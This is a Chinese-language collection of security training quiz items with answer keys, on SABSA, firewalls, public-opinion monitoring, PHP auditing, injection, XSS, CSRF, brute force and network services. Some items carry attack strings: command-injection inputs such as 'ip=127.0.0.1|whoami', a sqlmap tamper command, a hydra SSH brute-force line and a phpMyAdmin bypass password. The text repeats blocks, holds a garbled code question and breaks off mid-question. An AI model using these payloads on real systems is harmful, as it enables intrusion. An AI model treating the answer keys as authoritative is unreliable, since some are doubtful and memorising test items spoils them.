30、SABSA模型内容不包括的层次是():
A、 审计、战略
B、 度量、实施
C、 渗透、防御
D、 概念
标准答案: C
31、SABSA模型纵横坐标定义错误的是():
A、 纵坐标:上下文,概念层,逻辑层,物理层,组件层,运营层
B、 横坐标:什么,为什么,过程,谁,地点,时间
C、 纵坐标:业务连续性,风险管理,服务和支持,管理和支持,平台安全,日程表
D、 横坐标:数据结构,标准,工具,标识、功能、ACL,过程和协议,顺序
标准答案: C
32、SABSA模型不是基于安全架构开发的一个模型和方法论。()
A、 对
B、 错
标准答案: B
33、CobiT是一个IT实践帮助模型,也是指导、IT管理标岗、控制和参考模型。()
A、 对
B、 错
标准答案: A
34、第一代防火墙技术是基于电路层流量
A、 对
B、 错
标准答案: B
35、数据通过防火墙传输是发生在哪层
A、 会话层
B、 传输层
C、 网络层
D、 链路层
标准答案: C
36、防火墙术语中Trust指的是
A、 源端口
B、 源IP
C、 NAT
D、 DMZ
标准答案: B
37、集成防火墙类似于UTM
A、 对
B、 错
标准答案: A
38、防火墙的简单包过滤工作相关说法正确的是
A、 防火墙会检查数据区是否有恶意数据
B、 防火墙会建立连接状态表用于保持连接
C、 前后报文无关联
D、 防火墙对应用层控制较强
标准答案: C
39、防火墙包过滤规则中,21端口用于FTP数据包的传输
A、 对
B、 错
标准答案: B
40、CPU指令类型包括进程和线程
A、 对
B、 错
标准答案: A
41、分层级设计的操作系统中,0层控制哪方面
A、 应用程序
B、 存储
C、 处理器
D、 进程
标准答案: C
42、微内核架构中,核心在微内核,其它在客户端服务器端
A、 对
B、 错
标准答案: B
43、系统安全架构中属于终端防护的是
A、 主机防火墙
B、 交换机管理
C、 补丁管理
D、 上网监控
标准答案: A
44、操作系统安全保护的核心是系统应用程序及数据库功能
A、 对
B、 错
标准答案: B
45、Linux系统中对文件的权限控制属于哪类信息安全模型
A、 非干扰模型
B、 Biba模型
C、 Clark-Wilson模型
D、 访问矩阵模型
标准答案: D
46、以下哪类模型采用了分层级的设计
A、 信息流模型
B、 中国墙模型
C、 Bell-LaPadula模型
D、 非干扰模型
标准答案: C
47、状态机模型描述了一种无论处于何种状态都是绝对安全的系统
A、 对
B、 错
标准答案: B
48、人在互联网中的角色呈现多样性这个说法正确吗
A、 对
B、 错
标准答案: A
49、视频中以下哪项不是舆情分析需要的知识储备?
A、 传播学
B、 统计学
C、 心理学
D、 人体力学
标准答案: D
50、舆情是指社会公众对于网络上的某些事件和话题在现实中所进行的行为这个说法正确吗
A、 对
B、 错
标准答案: B
1、企业常见身份标识技术有ID、用户名、AD域控、行为管理设备、账号、LDAP。()
A、 对
B、 错
标准答案: A
2、通过观景、入口、设施社区布局、照明等条件模式来预防犯罪。()
A、 对
B、 错
标准答案: A
3、在车库内、楼梯间和电梯使用玻璃窗能让犯罪者打消作案心里想法。()
A、 对
B、 错
标准答案: A
4、TOGAF框架需求管理迭代步骤方法正确的是():
A、 架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
B、 预备阶段,架构能力管理,架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
C、 信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
D、 构架变更管理,实施治理,迁移规划,机会及解决方案,,技术架构,信息系统架构
标准答案: A
5、Zachman企业框架方向和设计都是采用纵横坐标。()
A、 对
B、 错
标准答案: A
6、Zachman模型不是基于人来开发的一个模型框架。()
A、 对
B、 错
标准答案: B
7、SABSA模型内容不包括的层次是():
A、 审计、战略
B、 度量、实施
C、 渗透、防御
D、 概念
标准答案: C
8、SABSA模型纵横坐标定义错误的是():
A、 纵坐标:上下文,概念层,逻辑层,物理层,组件层,运营层
B、 横坐标:什么,为什么,过程,谁,地点,时间
C、 纵坐标:业务连续性,风险管理,服务和支持,管理和支持,平台安全,日程表
D、 横坐标:数据结构,标准,工具,标识、功能、ACL,过程和协议,顺序
标准答案: C
9、SABSA模型不是基于安全架构开发的一个模型和方法论。()
A、 对
B、 错
标准答案: B
10、CobiT是一个IT实践帮助模型,也是指导、IT管理标岗、控制和参考模型。()
A、 对
B、 错
标准答案: A
11、第一代防火墙技术是基于电路层流量
A、 对
B、 错
标准答案: B
12、数据通过防火墙传输是发生在哪层
A、 会话层
B、 传输层
C、 网络层
D、 链路层
标准答案: C
13、防火墙术语中Trust指的是
A、 源端口
B、 源IP
C、 NAT
D、 DMZ
标准答案: B
14、集成防火墙类似于UTM
A、 对
B、 错
标准答案: A
15、防火墙的简单包过滤工作相关说法正确的是
A、 防火墙会检查数据区是否有恶意数据
B、 防火墙会建立连接状态表用于保持连接
C、 前后报文无关联
D、 防火墙对应用层控制较强
标准答案: C
16、防火墙包过滤规则中,21端口用于FTP数据包的传输
A、 对
B、 错
标准答案: B
17、CPU指令类型包括进程和线程
A、 对
B、 错
标准答案: A
18、分层级设计的操作系统中,0层控制哪方面
A、 应用程序
B、 存储
C、 处理器
D、 进程
标准答案: C
19、微内核架构中,核心在微内核,其它在客户端服务器端
A、 对
B、 错
标准答案: B
20、系统安全架构中属于终端防护的是
A、 主机防火墙
B、 交换机管理
C、 补丁管理
D、 上网监控
标准答案: A
21、操作系统安全保护的核心是系统应用程序及数据库功能
A、 对
B、 错
标准答案: B
22、Linux系统中对文件的权限控制属于哪类信息安全模型
A、 非干扰模型
B、 Biba模型
C、 Clark-Wilson模型
D、 访问矩阵模型
标准答案: D
23、以下哪类模型采用了分层级的设计
A、 信息流模型
B、 中国墙模型
C、 Bell-LaPadula模型
D、 非干扰模型
标准答案: C
24、状态机模型描述了一种无论处于何种状态都是绝对安全的系统
A、 对
B、 错
标准答案: B
25、人在互联网中的角色呈现多样性这个说法正确吗
A、 对
B、 错
标准答案: A
26、视频中以下哪项不是舆情分析需要的知识储备?
A、 传播学
B、 统计学
C、 心理学
D、 人体力学
标准答案: D
27、舆情是指社会公众对于网络上的某些事件和话题在现实中所进行的行为这个说法正确吗
A、 对
B、 错
标准答案: B
28、企业和政府中的舆情分析体系包括信息监测这个环节吗?
A、 对
B、 错
标准答案: A
29、在进行舆情事件分析时首先考量的是所在组织的利害关系这个说法对吗
A、 对
B、 错
标准答案: A
30、在案例中相关企业应当快速回应避免对品牌造成伤害这个说法正确吗
A、 对
B、 错
标准答案: A
31、监测系统的作用在于海量信息的筛选这个说法正确吗?
A、 对
B、 错
标准答案: A
32、舆情分析工作中可以根据情况自己进行决策执行这个说法正确吗
A、 对
B、 错
标准答案: B
33、研究舆情事件中参与者的身份构成重要吗
A、 对
B、 错
标准答案: A
34、下面哪些步骤是舆情管理中不必要的?
A、 舆情分析
B、 组织协同
C、 事后总结
D、 事件处理
标准答案: C
35、组织在舆情事件出现后的协同要根据组织架构中各个部分的职责和职能进行协同这个说法正确吗
A、 对
B、 错
标准答案: A
36、单个维权和群体维权对于舆情工作的区别只是在于数量这个说法正确吗
A、 对
B、 错
标准答案: B
37、这次事件后国家食品药品监督管理总局针对社会关心的疫苗安全问题发布科普知识予以回应,这是一种舆情处理吗?
A、 对
B、 错
标准答案: A
38、课程中的组织设计的管理考核是指划定舆情工作任务量化目标这个说法正确吗?
A、 对
B、 错
标准答案: A
39、管理者除了对舆情部门的管理还必须包括对自身信息的管理这个说法正确吗
A、 对
B、 错
标准答案: A
40、领导能力只包括政策解读和决策对应两种能力这个说法正确吗?
A、 对
B、 错
标准答案: B
41、分析研判包括对信息产生的后果的预测这个说法正确吗
A、 对
B、 错
标准答案: A
42、舆情工作的技术环节重点在于信息的收集和过滤这个说法正确吗
A、 对
B、 错
标准答案: A
43、视频中从哪个角度分析网民对快播案件的态度?
A、 法律
B、 网民结构
C、 道德
D、 互联网发展
标准答案: B
44、视频中提出的分析报告中网民主要的年龄段是多少?
A、 0-5
B、 6-17
C、 18-25
D、 25-35
标准答案: C
45、网站登记备案归以下哪个部门管理?
A、 公安部
B、 网信办
C、 宣传部
D、 国安部
标准答案: B
46、监测系统的最终目标在于什么?
A、 关键字监测
B、 敏感词发现
C、 内容分析
D、 提高效率
标准答案: D
47、关键字监测和敏感词发现的目的在于过滤不相关信息这个说法正确吗
A、 对
B、 错
标准答案: A
48、棱镜计划是只收集美国公民手机的隐私数据这个说法正确吗
A、 对
B、 错
标准答案: B
49、监测系统用户管理中的审批功能是为了保障信息安全这个说法正确吗?
A、 对
B、 错
标准答案: A
50、监测系统的重点在于信息收集能力,而不在于信息关联能力这个说法正确吗?
A、 对
B、 错
标准答案: B
1、如何使用sqlmap自带的绕过脚本?
A、 sqlmap.py -u “http://xxx.com/index.php?id=1” --dbs
B、 sqlmap.py -u “http://xxx.com/index.php” --data “id=1” --dbs
C、 sqlmap.py -u “http://xxx.com/index.php?id=1” -v 3 --tamper “xxx.py” --dbs
D、 sqlmap.py -u “http://xxxx.com/index.php” --cookie “id=1” --level 2 --dbs
标准答案: C
2、下列哪项不是文件信息泄露的途径?
A、 网站目录备份
B、 默认的网站数据库文件
C、 网站提供的上传功能
D、 第三方源代码管理
标准答案: C
3、下列关于Windows权限的继承,说法不当的是?
A、 新建的子文件夹和文件会继承上一级目录的权限
B、 根目录下的文件夹或文件继承磁盘分区的权限
C、 下级目录可以拒绝继承上级权限
D、 默认子目录不继承上一级目录权限
标准答案: D
4、下列Backup Operators组权限中,说法错误的是?
A、 从网络访问此计算机
B、 调整进程的内存分配
C、 允许本地登录
D、 关闭系统
标准答案: B
5、下列哪个工具可以造成局域网网络瘫痪?
A、 namp
B、 sqlmap
C、 arpspoof
D、 zaproxy
标准答案: C
6、下列解决“Zip炸弹”的办法中有效的是?
A、 限制文件大小和类型
B、 限制文件内容
C、 限制文件名称
D、 限制文件路径
标准答案: A
7、下列关于JAVA序列化机制的说法错误的是?
A、 包含系统资源的直接句柄和相对地址空间信息的字段不被声明为transient,该对象在序列化状态下可能会被修改
B、 保护虚拟机外的字节流的另一方式是对序列化包产生的流进行加密
C、 字节流加密防止解码或读取被序列化的对象的私有状态
D、 对象流就是将对象的内容进行流化,不可以对流化后的对象进行读写操作
标准答案: D
8、下列关于浏览器刷新和转到的说法错误的是?
A、 刷新检查时会保留之前的一些变量的值
B、 刷新浏览器取网页的新内容来更新本机缓存
C、 转到是浏览器会使用已经存于本机中的缓存
D、 转到使用本机中的缓存文件,同时保留之前的变量
标准答案: D
9、FileReader.read方法返回值的取值范围是____。
A、 0-127
B、 1-128
C、 0-255
D、 0-65535
标准答案: D
10、下列选项在样式表中会被浏览器忽略的____。
A、 /
B、 *
C、 //
D、 /**/
标准答案: D
11、CSS属性可以是元素固有的属性但不可以是自定义的属性。
A、 正确
B、 错误
标准答案: B
12、下面关于web组件的描述不正确的是____。
A、 主流的web前端框架包括:jQuery/Bootstrap/HTML5框架
B、 不同的web开发框架开发出的web应用功能也不同
C、 存储包括数据库存储、文件存储、内存存储
D、 目前最主流的web容器是Apache
标准答案: B
13、CSS属性可以是元素固有的属性但不可以是自定义的属性。
A、 正确
B、 错误
标准答案: B
14、下列代码 能够被
A、 IE6
B、 IE7
C、 IE8
D、 IE9
标准答案: A
15、下列选项在样式表中会被浏览器忽略的是?
A、 /
B、 *
C、 //
D、 /**/
标准答案: D
16、下列选项是firebug中控制台命令行输入开头符号的是?
A、 :
B、 ~
C、 //
D、 >
标准答案: D
17、FileReader.read方法返回值的取值范围是?
A、 0-127
B、 1-128
C、 0-255
D、 0-65535
标准答案: D
18、InputStream.read返回值为____,作为读取流结束标志。
A、 true
B、 false
C、 -1
D、 1
标准答案: C
19、下面关于web组件的描述不正确的是____。
A、 主流的web前端框架包括:jQuery/Bootstrap/HTML5框架
B、 不同的web开发框架开发出的web应用功能也不同
C、 存储包括数据库存储、文件存储、内存存储
D、 目前最主流的web容器是Apache
标准答案: B
20、下列在执行完exp后获取cmd的shell应该输入____命令。
A、 system
B、 cmd
C、 whoami
D、 shell
标准答案: D
21、下列中容易被xss窃取账号信息的是____。
A、 不轻易访问陌生链接
B、 使用无线网络应注意自己是否被劫持
C、 发现网站中存在xss告知网站客服
D、 直接打开并登录别人发的网址
标准答案: D
22、下列插件中,具有代理功能的是:
A、 Hackbar
B、 FoxyProxy
C、 ModifyHeaders
D、 ShowIP
标准答案: B
23、下列软件中,是源代码审计工具的是:
A、 PCHunter
B、 WebShellKill
C、 AZServerTool
D、 Seay审计工具
标准答案: D
24、php.ini 是___配置文件:
A、 全局
B、 当前文件夹
C、 指定文件夹
D、 指定文件
标准答案: A
25、在php配置文件,设置short_open_tag =On的意思是:
A、 启用全局变量
B、 关闭全局变量
C、 启用短标签
D、 关闭短标签
标准答案: C
26、开启php安全模式后,下列哪个代码无法正常执行:
A、
B、
C、
D、
标准答案: C
27、在php.ini中设置allow_url_include=off后,网站程序能够包含远程文件
A、 对
B、 错
标准答案: B
28、下列php函数属于危险函数的是:
A、 echo
B、 eval
C、 levenshtein
D、 php_check_syntax
标准答案: B
29、下列函数中,不属于包含函数的是:
A、 require
B、 include
C、 include_once
D、 levenshtein
标准答案: D
30、重命名一个文件或目录的函数是:
A、 rmdir
B、 unlink
C、 rename
D、 fopen
标准答案: C
31、下列函数中不属于命令执行函数的是:
A、 exec()
B、 proc_open()
C、 system()
D、 echo()
标准答案: D
32、php.ini中的安全模式是默认开启
A、 对
B、 错
标准答案: B
33、安装好XDebug后,需要配置什么文件才能够使用:
A、 php.ini
B、 .htaccess
C、 httpd.conf
D、 nsswitch.conf
标准答案: A
34、我们可以使用XDebug来跟踪,调试和分析PHP程序
A、 对
B、 错
标准答案: A
35、php程序中针对于安装问题的审计属于特定功能定向法:
A、 对
B、 错
标准答案: A
36、登录密码爆破属于哪一类漏洞:
A、 XSS
B、 sql注入
C、 撞库
D、 CSRF
标准答案: C
37、通过删除phpsessid,达到绕过验证码的目的,该攻击手法名称为:
A、 绕过sessid爆破
B、 修改sessid爆破
C、 sessid不更新造成爆破
D、 根据sessid生成验证码造成爆破
标准答案: A
38、通过使用不易被识别的验证码,且不根据sessid生成验证码内容能够有效防止爆破攻击
A、 对
B、 错
标准答案: A
39、下列漏洞中,哪些不属于注入漏洞:
A、 命令执行
B、 XSS
C、 敏感信息泄漏
D、 sql注入
标准答案: C
40、下列函数中,哪个不能用来执行命令注入漏洞:
A、 system()
B、 exec()
C、 echo()
D、 passthru()
标准答案: C
41、使用正则表达式对输入的参数进行过滤,能够达到修补和防御命令注入漏洞
A、 对
B、 错
标准答案: A
42、本机文件包含漏洞不能够包含哪些文件:
A、 日志文件
B、 本地网站文件
C、 远程木马文件
D、 session文件
标准答案: C
43、当allow_url_include和allow_url_fopen都设置为off时,能够直接包含共享文件
A、 对
B、 错
标准答案: A
44、下列注入漏洞不属于sql注入的是:
A、 数字型注入
B、 字符型注入
C、 cookie注入
D、 跨站脚本注入
标准答案: D
45、下列功能点不能够造成sql注入的有:
A、 使用模糊查询
B、 waf替换关键字
C、 使用id进行查询
D、 网站html标签过滤不完善
标准答案: D
46、使用完善的waf脚本且对sql语句中的参数进行处理,能够修补和杜绝sql注入漏洞
A、 对
B、 错
标准答案: A
47、截断注入在什么情况下比较适用:
A、 无法闭合单引号进行注入时
B、 数据库语句为双条件
C、 当无法闭合单引号进行注入时且为数据库语句为双条件
D、 当无法闭合单引号进行注入时不为数据库语句为双条件
标准答案: C
48、下列选项对二次注入说法正确的是:
A、 当用户输入的恶意数据首次传送给数据库时,将会进行安全的处理,但当应用程序调用时将会以一种危险的方式运行
B、 当用户输入的恶意数据传送给数据库时,应用程序调用时将会以一种危险的方式运行
C、 如果无法注释sql语句则无法进行二次注入攻击
D、 无法闭合单引号是,无法进行二次注入攻击
标准答案: A
49、为所有数据库访问使用参数查询并参数化集成到查询中的每个数据项,可以有效的防御二次注入漏洞
A、 对
B、 错
标准答案: A
50、任意文件读取属于什么漏洞:
A、 文件操作漏洞
B、 数据库操作漏洞
C、 XSS漏洞
D、 文件包含漏洞
标准答案: A
1、下列哪个操作不能通过越权漏洞来实现:
A、 修改管理员密码
B、 修改其他人帐号密码
C、 删除网站代码
D、 查看其它人信息
标准答案: C
2、越权漏洞分为平行越权和垂直越权:
A、 对
B、 错
标准答案: A
3、下列对跨站脚本攻击(XSS)的描述正确的是:
A、 XSS 攻击指的是恶意攻击在 WEB 页面里插入恶意代码, 当用户浏览该页面时嵌入其中 WEB 页面的代码会被执行
B、 XSS 攻击是 DOOS 攻击的一种变种
C、 XSS 攻击就是 CC 攻击
D、 XSS 攻击就是利用被控制的机器不断地向被攻击网站发送访问请求
标准答案: A
4、下列选项中,对非持久型xss攻击说法正确的是:
A、 非持久型XSS攻击是一次性的
B、 非持久型XSS攻击可以持续攻击,具有持续性
C、 非持久型XSS攻击是将攻击语句插入到服务器端
D、 非持久型XSS攻击可以对所有访问该网页的用户进行攻击
标准答案: A
5、根据近几年的统计web应用漏洞影响率最高的漏洞是
A、 XSS
B、 SQL注入
C、 信息泄露
标准答案: A
6、128位安全套接层技术是指哪种
A、 SSH
B、 SSL
C、 SH
标准答案: B
7、再互联网早期没有动态内容都是静态内容
A、 对
B、 错
标准答案: A
8、劫持账号是属于何种权限提升
A、 水平权限提升
B、 垂直权限提升
C、 扩展权限提升
标准答案: B
9、IIS或APCHE这种http底层服务器软件是属于哪种分类
A、 web应用
B、 web平台
C、 web客户端
标准答案: B
10、web应用攻击包括资源和认证,会话攻击等
A、 对
B、 错
标准答案: A
11、HTTP首部字段中的Host指的是以下哪种
A、 请求资源所在服务器
B、 发送指令的主机
C、 使用者的主机地址
标准答案: A
12、临时重定向在HTTP状态码中的数字代号是
A、 301
B、 302
C、 503
标准答案: B
13、以下属于HTTP方法的是
A、 POST
B、 ACL
C、 Cookie
标准答案: A
14、get方式只能支持ASCII字符
A、 对
B、 错
标准答案: A
15、关于CSRF说法正确的是
A、 删掉referer字段可以用来防止CSRF攻击
B、 CSRF攻击只能利用GET方式去达到攻击的目的
C、 登录受信任网站A,并在本地生成Cookie,在不登出A的情况下,访问危险网站B这样有可能会受到CSRF攻击
D、 XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站
标准答案: D
16、xss和csrf的漏洞原理是一样的
A、 对
B、 错
标准答案: B
17、利用CSRF漏洞进行测试,相关说法错误的是
A、 CSRF是利用管理员的操作在无声无息中进行
B、 攻击者在无法预计管理员操作的过程中也是可以进行CSRF的攻击操作
C、 普通用户插入备份数据库的代码后,通过CSRF管理员触发到代码后会自动备份网站的数据库
D、 默认设置情况下,找到备份数据库的网站路径即可下载网址的.sql文件
标准答案: B
18、CSRF可以在无声无息中进行管理员的操作
A、 对
B、 错
标准答案: A
19、关于验证码说法错误的是
A、 为了防止恶意破解密码,刷票,论坛灌水,刷页
B、 可以防止黑客对特定注册用户特定程序进行暴力破解登陆
C、 验证码通常使用一些线条和一些不规则的字符组成
D、 通过手机短信发送的4位数验证码是非常安全的
标准答案: D
20、保证验证码的新鲜度可以有效的防止大多数暴力破解攻击
A、 对
B、 错
标准答案: A
21、绕过验证码的方法不包括
A、 统默认不显示验证码,而是在用户校验错误一定次数之后再出现,在cookie中写入一个标记,比如loginErr = 1,后续错误累加。 攻击者不带Cookie提交请求即可绕过验证码功能。
B、 验证码在web服务器上对应一个session值,攻击者在cookie中带固定的sessionID和固定的一个验证码字符串,即可轻松爆破。
C、 程序把验证码的内容发送到客户端cookie、或输出到response headers的其他字段,攻击者可以轻松逆向破解得到原值。
D、 如果实施ip策略强制输入验证码,这样可以防止验证码的安全问题,没办法攻破
标准答案: D
22、安全的验证码使用规则最合适的是验证码只能用一次
A、 对
B、 错
标准答案: A
23、关于验证码识别并且暴力破解密码说法错误的是
A、 4位数的图像验证码是可以被工具直接识别的,安全性形同虚设
B、 爆破成功以后会提示302跳转登陆
C、 不管验证码是图片还是数字,只要随机不够,图片干扰不够还是有机会可以进行验证码的机器识别
D、 验证码可以解决90%以上的Web安全问题
标准答案: D
24、解决验证码识别问题是攻击者为了更好的进行暴力破解攻击
A、 对
B、 错
标准答案: A
25、php中哪些函数可以执行系统命令
A、 file_put_contents
B、 system
C、 print_r
D、 var_dump
标准答案: B
26、系统命令执行是指应用程序对传入命令行的参数过滤不严导致恶意用户能控制最终执行的命令
A、 对
B、 错
标准答案: A
27、通过php哪项配置可以禁止webshell执行系统命令
A、 disable_setting
B、 disable_shell
C、 disable_functions
D、 disable_config
标准答案: C
28、``可以执行系统命令
A、 对
B、 错
标准答案: A
29、对于下面代码,能成功执行命令的选项是 t a r g e t = t r i m ( target = trim( target=trim(_REQUEST[ ‘ip’ ]); KaTeX parse error: Expected 'EOF', got '&' at position 25: …ions = array( '&̲amp;' => '',…’ => ‘’, ‘(’ => ‘’, ‘)’ => ‘’, ‘`’ => ‘’, ); $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); $cmd = shell_exec( 'ping -c 4 ’ . KaTeX parse error: Expected 'EOF', got '&' at position 8: target &̲#41;; print_r(cmd); } ?>
A、 ip=127.0.0.1|whoami
B、 ip=127.0.0.1&whoami
C、 ip=127.0.0.1||whoami
D、 ip=127.0.0.1&&whoami
标准答案: C
30、对于下面代码,能成功执行”whoami”的选项是
A、 ip=127.0.0.1|whoami
B、 ip=127.0.0.1&whoami
C、 ip=127.0.0.1||whoami
D、 ip=127.0.0.1&&whoami
标准答案: A
31、如果||的前面命令执行失败则执行 || 后面的命令
A、 对
B、 错
标准答案: A
32、关于MS15-034HTTP远程代码执行漏洞说法正确的是
A、 利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。
B、 该漏洞对服务器系统造成了不小的影响,主要影响了Centos,redhat等LINUX的主流服务器操作系统。
C、 MS15-034HTTP远程代码执行漏洞的CVE编号为CVE-2015-1647
D、 Http.sys 为了在Windows平台上优化niginx服务器性能而引入的一个内核模式驱动程序。它为niginx及其他需要运用HTTP协议的微软服务器功能提供HTTP请求的接收与响应、快速缓存、提高性能、日志等功能服务。
标准答案: A
33、MS15-034可以进行本地提权
A、 对
B、 错
标准答案: B
34、关于Jboss反序列化漏洞说法有误的是
A、 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程
B、 Jboss反序列化漏洞是在反序列化时并没有限制实例化对象的类型,导致可以任意构造应用中已经包含的对象利用反序列化操作进行实例化。
C、 Java 在进行反序列化操作的时候会使用 ObjectInputStream 类调用 readObject() 方法去读取传递过来的序列化对象字节流进行处理
D、 Boss反序列化漏洞文件是JMXInvokerServlet
标准答案: D
35、解决Jboss远程方法调用漏洞把invoker删除再把1099关闭即可
A、 对
B、 错
标准答案: A
36、关于st2说法错误的是
A、 存在st2漏洞的网站可以执行命令
B、 存在st2漏洞的网站大多数是最高权限
C、 s2-016参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行
D、 st2漏洞会导致php网站被攻陷
标准答案: D
37、st2漏洞是没有正确过滤用户的输入输出导致的问题
A、 对
B、 错
标准答案: A
38、关于心脏出血漏洞说法错误的是
A、 Heartbleed漏洞产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查
B、 Heartbleed漏洞可以获得https传输的用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据
C、 Heartbleed漏洞是近几年来影响广泛,覆盖面广,危害很高的漏洞之一
D、 利用Heartbleed漏洞用户每次读取都能获得相关用户名密码
标准答案: D
39、关于CVE-2015-4024说法有误的是
A、 是PHP multipart/form-data 导致的远程DOS漏洞
B、 因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS
C、 在该漏洞中multipart_buffer_headers函数解析header对应value时,value值是不存在的
D、 升级PHP版本可以很好的抵御该漏洞的攻击
标准答案: C
40、DDOS攻击也有可能是代码本身导致的问题
A、 对
B、 错
标准答案: A
41、关于逻辑/越权漏洞说法有误的是
A、 任意用户查询,任意删属于越权漏洞,而密码找回漏洞属于逻辑漏洞
B、 一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。
C、 垂直权限的访问控制缺失是逻辑/越权漏洞的根本原因
D、 密码找回漏洞是权限管理不足导致的问题
标准答案: D
42、挖掘密码找回逻辑漏洞黑盒Fuzz来推断程序代码是关键
A、 对
B、 错
标准答案: A
43、关于密码找回说法有误的是
A、 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解
B、 有些密码找回凭证可从客户端直接获取
C、 密码找回凭证存与单个用户绑定的可以解决密码找回漏洞
D、 修改密码过程中,验证码是可操作的话 可以直接导致密码重置
标准答案: C
44、有时候我们可以通过注入漏洞来控制找回密码的凭证来达到密码重置的目的
A、 对
B、 错
标准答案: A
45、关于越权漏洞说法有误的是
A、 1. 越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定
B、 2. 挖掘越权漏洞一般是从一些拥有敏感信息的地方(例如:收货地址/个人资料/用户订单等)进行测试
C、 3. 处理越权漏洞可以通过用户对某一数据进行增删改查时需要去校验下所操作的数据是否属于该用户
D、 4. 越权漏洞的本身对网站不会照成攻击伤害
标准答案: D
46、下列关于暴力破解说法错误的是
A、 1. 暴力猜解就是将密码进行逐个推算,直到找到正真的密码为止
B、 2. 暴力破解分为c/s架构的破解和b/s架构的破解
C、 3. 暴力破解的成功率取决于字典的准确性和覆盖性
D、 4. 只要有数据传输的地方就可以进行暴力破解
标准答案: D
47、 暴力破解即是一个无限穷举的过程
A、 对
B、 错
标准答案: A
48、关于hydra使用说法有误的是
A、 hydra在Linux和windows平台上都可以使用
B、 爆破ssh hydra -L users.txt -P password.txt -t 1 -vV -e ns x.x.x.x ssh
C、 hydra可以支持大多数服务和协议
D、 hydra可以支持一个C段服务器的22端口爆破
标准答案: D
49、关于eWebEditor编辑器说法有误的是
A、 1. eWebEditor编辑器一般都是通过默认口令进入后台来拿shell
B、 2. 加入下载到ewebeditor.mdb可以通过某些工具来读取管理员密码
C、 3. eWebEditor后台修改自定义上传后缀即可拿shell
D、 4. 可以配合iis6等服务器的解析漏洞来获得网站的webshell
标准答案: D
50、关于FCKeditor 说法有误的是
A、 1. 默认查看编辑器版本通过FCKeditor/_whatsnew.html
B、 2. 默认编辑页FCKeditor/_samples/default.html 等等
C、 3. 在FCKeditor2.2到2.4.2的php版本中存在任意文件上传
D、 4. FCKeditor只有任意文件上传漏洞
标准答案: D
1、phpmyadmin某些低版本中存在的万能密码是
A、 localhost’@’@’
B、 localhost’@’@"
C、 localhost’@"@"
标准答案: B
2、通过扫描器很难扫描到逻辑漏洞,这种说法正确吗
A、 对
B、 错
标准答案: A
3、IIS 组件中不包括以下哪项服务?
A、 WEB 服务
B、 FTP 服务
C、 APACHE 服务
D、 SMTP 服务
标准答案: C
4、在网站属性的目录安全性中,不可以定义的是以下哪一项?
A、 身份验证和访问控制
B、 目录权限设置
C、 IP地址和域名限制
D、 安全通信
标准答案: B
5、IIS 安装后,默认可以使用ASP、ASP.NET等功能,是否正确?
A、 对
B、 错
标准答案: B
6、FTP 服务默认端口是?
A、 21
B、 80
C、 8080
D、 22
标准答案: A
7、以下哪个命令可往FTP服务器传输文件?
A、 GET
B、 INPUT
C、 PUT
D、 OPEN
标准答案: C
8、FTP 主要是用来实现客户端与服务器的文件传输,是否正确?
A、 对
B、 错
标准答案: A
9、使用以下哪个选项可以查看本机路由表?
A、 route add
B、 route print
C、 route delete
D、 route change
标准答案: B
10、以下不属于 “ 外部网络协议” 主要功能的是?
A、 用于外部邻站的获取
B、 用于邻站的可达性测试
C、 用于选路由信息更新
D、 用于本地系统内部使用的选路协议
标准答案: D
11、Windows Server 2003的 “路由和远程访问” 服务是一个全功能的软件路由器,是否正确?
A、 对
B、 错
标准答案: A
12、按照协议分类,以下不属于VPN类型的是?
A、 PPTP
B、 L2TP
C、 IPSec
D、 TCP
标准答案: D
13、Windows Server 2003中,远程访问策略,默认有几个?
A、 1
B、 2
C、 3
D、 4
标准答案: B
14、某公司员工出差到外地,他想访问企业内网的服务器资源,这时候我们可以通过VPN技术来实现,是否正确?
A、 对
B、 错
标准答案: A
15、以下哪个命令可以查看Linux系统是否安装了BIND程序包?
A、 rpm -q bind
B、 rpm -i bind
C、 rpm -v bind
D、 rpm -h bind
标准答案: A
16、以下哪个选项可以重启DNS服务?
A、 service named stop
B、 service named start
C、 /etc/rc.d/init.d/named stop
D、 service named restart
标准答案: D
17、在主配置文件中添加所规划的正向区域和反向区域,以“zone”为关键字设定区域,指向区域文件所在位置和文件名,是否正确?
A、 对
B、 错
标准答案: A
18、在 wireshark筛选器中,可以捕获出所有 ip 为 192.168.1.1 的是?
A、 ip.src == 192.168.1.1
B、 ip.dst == 192.168.1.1
C、 ip.addr == 192.168.1.1
D、 !(ip.src == 192.168.1.1)
标准答案: C
19、对于筛选器中输入 ip.addr == 192.168.1.1 and tcp.port == 8080描述正确的是?
A、 筛选出目的IP地址为 192.168.1.1 并且端口为 8080 的数据包
B、 筛选出目的IP地址为 192.168.1.1 或者端口为 8080 的数据包
C、 筛选出所有IP地址为 192.168.1.1 并且端口为 8080 的数据包
D、 筛选出所有IP地址为 192.168.1.1 或者端口为 8080 的数据包
标准答案: C
20、在 wireshark筛选器中,输入 http 可以捕获 http 协议的数据包,是否正确?
A、 对
B、 错
标准答案: A
21、wireshark 中,Statistics菜单项下的 Protocol Hierarchy 选项主要功能是什么?
A、 显示捕捉数据摘要
B、 显示协议统计分层信息
C、 显示会话列表
D、 显示端点列表
标准答案: B
22、wireshark中最活跃的通讯端点,并不一定包括流量最大的会话,是否正确?
A、 对
B、 错
标准答案: A
23、在IO Graphs 中,可以使用哪项命令排查有丢失的数据包?
